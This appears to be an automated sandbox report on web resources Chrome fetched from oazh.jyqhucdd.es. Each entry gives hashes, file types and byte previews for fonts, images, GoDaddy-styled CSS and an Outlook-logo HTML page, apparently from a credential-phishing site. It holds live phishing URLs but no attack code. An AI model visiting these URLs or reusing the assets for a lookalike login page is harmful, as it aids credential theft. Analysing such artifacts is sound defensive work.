                                                                                                                                                                                                                                    Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):43596
                                                                                                                                                                                                                                    Entropy (8bit):7.9952701440723475
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                                                                                                                                    SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                                                                                                                                    SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                                                                                                                                    SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/GDSherpa-vf.woff2
                                                                                                                                                                                                                                    Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):644
                                                                                                                                                                                                                                    Entropy (8bit):4.6279651077789685
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:541B83C2195088043337E4353B6FD60D
                                                                                                                                                                                                                                    SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                                                                                                                                                                                    SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                                                                                                                                                                                    SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):128
                                                                                                                                                                                                                                    Entropy (8bit):4.750616928608237
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                                                                                                                                                                                    SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                                                                                                                                                                                    SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                                                                                                                                                                                    SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCSeilFEHvOyuEgUNX1f-DRIFDRObJGMhInHD9Kl7acISSgn6r7TgB5kezxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IXvsB0wUcGF4?alt=proto
                                                                                                                                                                                                                                    Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):7390
                                                                                                                                                                                                                                    Entropy (8bit):4.02755241095864
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                                                                                                                    SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                                                                                                                    SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                                                                                                                                    SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):35786
                                                                                                                                                                                                                                    Entropy (8bit):5.058073854893359
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                                                                                                                                                                                    SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                                                                                                                                                                                    SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                                                                                                                                                                                    SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/abqxZQ7ipqHVgh30
                                                                                                                                                                                                                                    Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:0
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (52003), with CRLF line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):151550
                                                                                                                                                                                                                                    Entropy (8bit):5.850716243112222
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:0E572C27309A31DA23524B22AABCFC00
                                                                                                                                                                                                                                    SHA1:8EC603365C5A1762DD52B90B9D35BD2054B0D97A
                                                                                                                                                                                                                                    SHA-256:C6E37AE825BAEA22FF324F6EF831C8FB8BFD1C4E8D5615A9A78228151A698B02
                                                                                                                                                                                                                                    SHA-512:FF0CBF244F9E4738B68405199926CAFF1B32FDBA6B53C3D0C27652E1987EB0C5961E47792C4C6D8E1E4C5DF426F7DAB3E19B623518C1E82268B0C3C7E86A14EE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUU
                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):93276
                                                                                                                                                                                                                                    Entropy (8bit):7.997636438159837
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                                                                                                                                    SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                                                                                                                                    SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                                                                                                                                    SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/GDSherpa-vf2.woff2
                                                                                                                                                                                                                                    Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10017)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):10245
                                                                                                                                                                                                                                    Entropy (8bit):5.437589264532084
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                                                                                                                                                                    SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                                                                                                                                                                    SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                                                                                                                                                                    SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250325%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250325T130408Z&X-Amz-Expires=300&X-Amz-Signature=33215a3452021144bf19fcdb418538d830ecaf10bdf4d6b3c45bbda2c6da929d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                                    Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):10796
                                                                                                                                                                                                                                    Entropy (8bit):7.946024875001343
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                                                                                                                                    SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                                                                                                                                    SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                                                                                                                                    SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):25216
                                                                                                                                                                                                                                    Entropy (8bit):7.947339442168474
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:F9A795E2270664A7A169C73B6D84A575
                                                                                                                                                                                                                                    SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                                                                                                                                                                                    SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                                                                                                                                                                                    SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):892
                                                                                                                                                                                                                                    Entropy (8bit):5.863167355052868
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                                                                                                                                                                    SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                                                                                                                                                                    SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                                                                                                                                                                    SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/opQfrfYZGLkLvo8jPsDC7h3ImnnJCquFXKGeBnVMWqVKFznM45134
                                                                                                                                                                                                                                    Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):270
                                                                                                                                                                                                                                    Entropy (8bit):4.840496990713235
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                                                                                                                    SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                                                                                                                    SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                                                                                                                    SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/efPyNSGiny5h4d7TrMi6Wxkf25Oqgukl4H0BdEkiM2LId78143
                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):89501
                                                                                                                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
